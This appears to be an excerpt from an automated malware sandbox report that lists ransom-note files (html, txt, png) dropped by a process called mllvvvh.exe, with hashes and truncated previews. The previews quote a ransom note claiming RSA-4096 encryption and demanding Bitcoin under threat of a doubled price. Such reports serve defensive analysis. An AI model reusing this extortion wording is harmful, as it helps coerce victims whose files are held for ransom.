                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
